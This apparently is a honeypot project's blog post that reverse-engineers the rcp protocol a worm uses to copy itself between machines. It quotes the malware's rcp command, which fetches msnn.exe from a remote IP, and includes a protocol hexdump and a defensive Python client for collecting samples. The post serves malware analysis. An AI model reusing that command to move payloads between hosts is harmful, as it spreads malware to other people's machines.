Some time ago, we got reports that malware was using the rcp.exe client to transfer itself to another box.
Wise choice: the protocol is much simpler than FTP, as you don't need two connections, and it is much more robust than TFTP, as it uses TCP instead of UDP. It was actually pretty hard to find out how it works, as there is no RFC or any other documentation.
Microsoft was pretty lazy creating their rcp.exe client: they just compiled the BSD-licensed code on Windows and were done.
I had a look at the BSD code and ended up installing the whole r(sh|shd|login|logind|cp) family on my box, and using Ethereal to find out how it works.
When I started understanding the pretty insane security model behind rsh, I suddenly knew why nobody documented it: there is no security layer, and nobody wants their name under the protocol description.
The command the malware runs on Windows:

```
rcp -b 82.24.130.196.thebuz:msnn.exe msnn.exe
```

If you want to check it out using Unix rcp:

```
rcp thebuz@82.24.130.196:msnn.exe msnn.exe
```
| Byte | Client hexdump | Client text | Server hexdump | Server text | Step |
|---|---|---|---|---|---|
| 00000 | 00 | . | | | 1 |
| 00001 | 74 68 65 62 75 7a 00 74 68 65 62 75 7a 00 72 63 | thebuz.thebuz.rc | | | |
| 00011 | 70 20 2d 66 20 6d 73 6e 6e 2e 65 78 65 00 | p -f msnn.exe. | | | |
| 00000 | | | 00 | . | 2 |
| 0001F | 00 | . | | | 3 |
| 00001 | | | 43 30 37 35 35 20 31 30 36 30 30 31 20 6d 73 6e | C0755 106001 msn | 4 |
| 00011 | | | 6e 2e 65 78 65 0a | n.exe. | |
| 00020 | 00 | . | | | 5 |
| 00017 | | | 4d 5a 00 00 00 00 00 00 00 00 00 00 50 45 00 00 | MZ..........PE.. | 6 |
| 00027 | | | 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 | L............... | |
| ... | | | .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. | ................ | |
| 19E17 | | | 00 00 00 00 00 00 00 00 00 cf cb 09 00 0c 30 08 | ..............0. | |
| 19E27 | | | 00 | . | |
| 19E28 | | | 00 | . | |
(don't ask how long it took me to draw it)

1. The client connects to the server and asks for the file msnn.exe, offering 'credentials' for the server's local user thebuz and the client's local user thebuz.
2. The server accepts the request.
3. The client accepts the server's acceptance.
4. The server sends the file information: permission set, size and name.
5. The client accepts the file permissions.
6. The server sends the file, followed by an additional 0 byte.
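The six steps above, as an added example that is neither nepenthes code nor the BSD rcp code: a Python client that runs the exchange against an in-memory server stream, parses the `C<mode> <size> <name>` header and sanity-checks it before accepting the body, which is what a honeypot fetching a sample would want. The empty stderr-port field follows the dump; the sample payload and the size cap are constructed assumptions.

```python
import io
import re

# Constructed sample payload (the real msnn.exe in the dump is 106001 bytes);
# only the framing matters here.
SAMPLE_BODY = b"MZ\x90\x00\x00\x00PE\x00\x00"
MAX_FILE_SIZE = 16 * 1024 * 1024   # assumed cap so a hostile size field cannot exhaust memory

# Step 4 header: 'C' + 4 octal mode digits, decimal size, file name, newline.
HEADER_RE = re.compile(rb"^C([0-7]{4}) (\d+) ([^\n]+)\n$")

class RcpError(Exception):
    pass

def build_rsh_request(local_user, remote_user, remote_file):
    """Step 1: stderr port (empty, as in the dump), local user, remote user
    and the command 'rcp -f <file>', each NUL-terminated."""
    return (b"\0" + local_user.encode() + b"\0" + remote_user.encode() + b"\0"
            + b"rcp -f " + remote_file.encode() + b"\0")

def build_server_response(mode, name, body):
    """Steps 2, 4 and 6 as the source side emits them (feeds the client below)."""
    header = b"C%04o %d %s\n" % (mode, len(body), name.encode())
    return b"\0" + header + body + b"\0"

def _read_exact(server, n):
    data = server.read(n)
    if len(data) != n:
        raise RcpError("server closed the connection early")
    return data

def rcp_fetch(server, client, local_user, remote_user, remote_file):
    """Client half of the exchange: `server` is a readable byte stream, `client`
    a writable one. Returns (mode, name, data) or raises RcpError."""
    client.write(build_rsh_request(local_user, remote_user, remote_file))  # step 1
    if _read_exact(server, 1) != b"\0":                                     # step 2
        raise RcpError("rsh handshake refused: " + server.readline().decode(errors="replace"))
    client.write(b"\0")                                                    # step 3
    line = server.readline()                                               # step 4
    m = HEADER_RE.match(line)
    if not m:
        raise RcpError("bad file header %r" % line)
    mode, size, name = int(m.group(1), 8), int(m.group(2)), m.group(3).decode()
    # Checks a honeypot wants before trusting a hostile server's header.
    if size > MAX_FILE_SIZE or "/" in name or "\\" in name or name in (".", ".."):
        raise RcpError("rejecting header %r" % line)
    client.write(b"\0")                                                    # step 5
    data = _read_exact(server, size)                                       # step 6
    if _read_exact(server, 1) != b"\0":
        raise RcpError("missing trailing 0 after file data")
    client.write(b"\0")  # final acknowledgement
    return mode, name, data

def run_sample():
    server = io.BytesIO(build_server_response(0o755, "msnn.exe", SAMPLE_BODY))
    return rcp_fetch(server, io.BytesIO(), "thebuz", "thebuz", "msnn.exe")
```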
As you might guess, I just finished it; writing it was a real pain. Apart from the protocol, the main problem was typing rpc instead of rcp. If we get some time, you will get a patch for it, else …
Some days ago I posted some news mentioning that the Korgo flood had stopped for me; actually, it started again.

If you experience the same, or have an explanation for this mystery, please drop me a line.
nepenthes hit Debian unstable package management some time ago, which means installing nepenthes on Debian is as simple as typing:

```
apt-get update
apt-cache show nepenthes
apt-get install nepenthes
```
http://packages.debian.org/unstable/net/nepenthes
Thanks to the maintainer Luciano Bello.